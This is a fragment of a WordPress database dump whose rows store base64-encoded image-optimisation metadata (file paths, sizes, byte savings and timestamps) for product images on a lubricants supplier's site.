INSERT INTO `wp_postmeta` VALUES (28825, 2397, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvYXV0b21vdGl2ZS1sdWJyaWNhbnRzLmpwZyIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvYXV0b21vdGl2ZS1sdWJyaWNhbnRzLmpwZyIsIndpZHRoIjoxNDcyLCJoZWlnaHQiOjc1NiwibWltZV90eXBlIjoiIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL2F1dG9tb3RpdmUtbHVicmljYW50cy5qcGciLCJyZWR1Y3Rpb24iOjMzNzU1OSwidGltZSI6MTQ4MzU0ODY0NiwiaWQiOiIyMzk3In0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9hdXRvbW90aXZlLWx1YnJpY2FudHMtMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9hdXRvbW90aXZlLWx1YnJpY2FudHMtMzQweDM0MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzEwXC9hdXRvbW90aXZlLWx1YnJpY2FudHMtMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDg2NDgsImlkIjoyMzk3fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL2F1dG9tb3RpdmUtbHVicmljYW50cy04MDB4NDExLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NDExLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL2F1dG9tb3RpdmUtbHVicmljYW50cy04MDB4NDExLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL2F1dG9tb3RpdmUtbHVicmljYW50cy04MDB4NDExLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU0ODY1MSwiaWQiOjIzOTd9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvYXV0b21vdGl2ZS1sdWJyaWNhbnRzLTc2OHgzOTQuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0IjozOTQsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvYXV0b21vdGl2ZS1sdWJyaWNhbnRzLTc2OHgzOTQuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMFwvYXV0b21vdGl2ZS1sdWJyaWNhbnRzLTc2OHgzOTQuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTQ4NjU0LCJpZCI6MjM5N30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9hdXRvbW90aXZlLWx1YnJpY2FudHMtMjUweDI1MC5qcGciLCJ3aWR0aCI6MjUwLCJoZWlnaHQiOjI1MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9hdXRvbW90aXZlLWx1YnJpY2FudHMtMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzEwXC9hdXRvbW90aXZlLWx1YnJpY2FudHMtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDg2NTYsImlkIjoyMzk3fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL2F1dG9tb3RpdmUtbHVicmljYW50cy0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL2F1dG9tb3RpdmUtbHVicmljYW50cy0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL2F1dG9tb3RpdmUtbHVicmljYW50cy0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU0ODY1OCwiaWQiOjIzOTd9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvYXV0b21vdGl2ZS1sdWJyaWNhbnRzLTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvYXV0b21vdGl2ZS1sdWJyaWNhbnRzLTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMFwvYXV0b21vdGl2ZS1sdWJyaWNhbnRzLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTQ4NjYxLCJpZCI6MjM5N30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9hdXRvbW90aXZlLWx1YnJpY2FudHMtNTEweDYwMC5qcGciLCJ3aWR0aCI6NTEwLCJoZWlnaHQiOjYwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9hdXRvbW90aXZlLWx1YnJpY2FudHMtNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzEwXC9hdXRvbW90aXZlLWx1YnJpY2FudHMtNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDg2NjMsImlkIjoyMzk3fV0='); 
INSERT INTO `wp_postmeta` VALUES (28826, 2391, 'wpfc_optimisation_reduction', '362601'); 
INSERT INTO `wp_postmeta` VALUES (28827, 2391, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvQXV0b21vdGl2ZS1HcmVhc2UuanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9BdXRvbW90aXZlLUdyZWFzZS5qcGciLCJ3aWR0aCI6MTQ3MiwiaGVpZ2h0Ijo3NTYsIm1pbWVfdHlwZSI6IiIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzEwXC9BdXRvbW90aXZlLUdyZWFzZS5qcGciLCJyZWR1Y3Rpb24iOjM2MjU5NCwidGltZSI6MTQ4MzU0ODY3MiwiaWQiOiIyMzkxIn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9BdXRvbW90aXZlLUdyZWFzZS0zNDB4MzQwLmpwZyIsIndpZHRoIjozNDAsImhlaWdodCI6MzQwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL0F1dG9tb3RpdmUtR3JlYXNlLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMFwvQXV0b21vdGl2ZS1HcmVhc2UtMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDg2NzUsImlkIjoyMzkxfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL0F1dG9tb3RpdmUtR3JlYXNlLTgwMHg0MTEuanBnIiwid2lkdGgiOjgwMCwiaGVpZ2h0Ijo0MTEsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvQXV0b21vdGl2ZS1HcmVhc2UtODAweDQxMS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzEwXC9BdXRvbW90aXZlLUdyZWFzZS04MDB4NDExLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU0ODY3OCwiaWQiOjIzOTF9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvQXV0b21vdGl2ZS1HcmVhc2UtNzY4eDM5NC5qcGciLCJ3aWR0aCI6NzY4LCJoZWlnaHQiOjM5NCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9BdXRvbW90aXZlLUdyZWFzZS03Njh4Mzk0LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL0F1dG9tb3RpdmUtR3JlYXNlLTc2OHgzOTQuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTQ4NjgwLCJpZCI6MjM5MX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9BdXRvbW90aXZlLUdyZWFzZS0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL0F1dG9tb3RpdmUtR3JlYXNlLTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMFwvQXV0b21vdGl2ZS1HcmVhc2UtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDg2ODMsImlkIjoyMzkxfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL0F1dG9tb3RpdmUtR3JlYXNlLTIwMHgyMDAuanBnIiwid2lkdGgiOjIwMCwiaGVpZ2h0IjoyMDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvQXV0b21vdGl2ZS1HcmVhc2UtMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzEwXC9BdXRvbW90aXZlLUdyZWFzZS0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU0ODY4NSwiaWQiOjIzOTF9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvQXV0b21vdGl2ZS1HcmVhc2UtMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9BdXRvbW90aXZlLUdyZWFzZS0yMjV4MjI1LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL0F1dG9tb3RpdmUtR3JlYXNlLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTQ4Njg3LCJpZCI6MjM5MX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9BdXRvbW90aXZlLUdyZWFzZS01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL0F1dG9tb3RpdmUtR3JlYXNlLTUxMHg2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMFwvQXV0b21vdGl2ZS1HcmVhc2UtNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDg2OTAsImlkIjoyMzkxfV0='); 
INSERT INTO `wp_postmeta` VALUES (28828, 2386, 'wpfc_optimisation_reduction', '88201'); 
INSERT INTO `wp_postmeta` VALUES (28829, 2386, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzQ0Mjg0NzM1Ni5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja180NDI4NDczNTYuanBnIiwid2lkdGgiOjYwMDAsImhlaWdodCI6NDAwMCwibWltZV90eXBlIjoiIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja180NDI4NDczNTYuanBnIiwicmVkdWN0aW9uIjo4ODE5MywidGltZSI6MTQ4MzU0ODcwMiwiaWQiOiIyMzg2In0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfNDQyODQ3MzU2LTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzQ0Mjg0NzM1Ni0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja180NDI4NDczNTYtMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDg3MDUsImlkIjoyMzg2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja180NDI4NDczNTYtODAweDUzMy5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjUzMywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfNDQyODQ3MzU2LTgwMHg1MzMuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzQ0Mjg0NzM1Ni04MDB4NTMzLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU0ODcwOSwiaWQiOjIzODZ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzQ0Mjg0NzM1Ni03Njh4NTEyLmpwZyIsIndpZHRoIjo3NjgsImhlaWdodCI6NTEyLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja180NDI4NDczNTYtNzY4eDUxMi5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfNDQyODQ3MzU2LTc2OHg1MTIuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTQ4NzEyLCJpZCI6MjM4Nn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfNDQyODQ3MzU2LTE2MDB4MTA2Ny5qcGciLCJ3aWR0aCI6MTYwMCwiaGVpZ2h0IjoxMDY3LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja180NDI4NDczNTYtMTYwMHgxMDY3LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja180NDI4NDczNTYtMTYwMHgxMDY3LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU0ODcxNywiaWQiOjIzODZ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzQ0Mjg0NzM1Ni0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja180NDI4NDczNTYtMjUweDI1MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfNDQyODQ3MzU2LTI1MHgyNTAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTQ4NzE5LCJpZCI6MjM4Nn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfNDQyODQ3MzU2LTIwMHgyMDAuanBnIiwid2lkdGgiOjIwMCwiaGVpZ2h0IjoyMDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzQ0Mjg0NzM1Ni0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja180NDI4NDczNTYtMjAweDIwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDg3MjIsImlkIjoyMzg2fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja180NDI4NDczNTYtMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfNDQyODQ3MzU2LTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzQ0Mjg0NzM1Ni0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU0ODcyNSwiaWQiOjIzODZ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzQ0Mjg0NzM1Ni01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja180NDI4NDczNTYtNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfNDQyODQ3MzU2LTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTQ4NzI4LCJpZCI6MjM4Nn1d'); 
INSERT INTO `wp_postmeta` VALUES (28830, 2382, 'wpfc_optimisation_reduction', '219888'); 
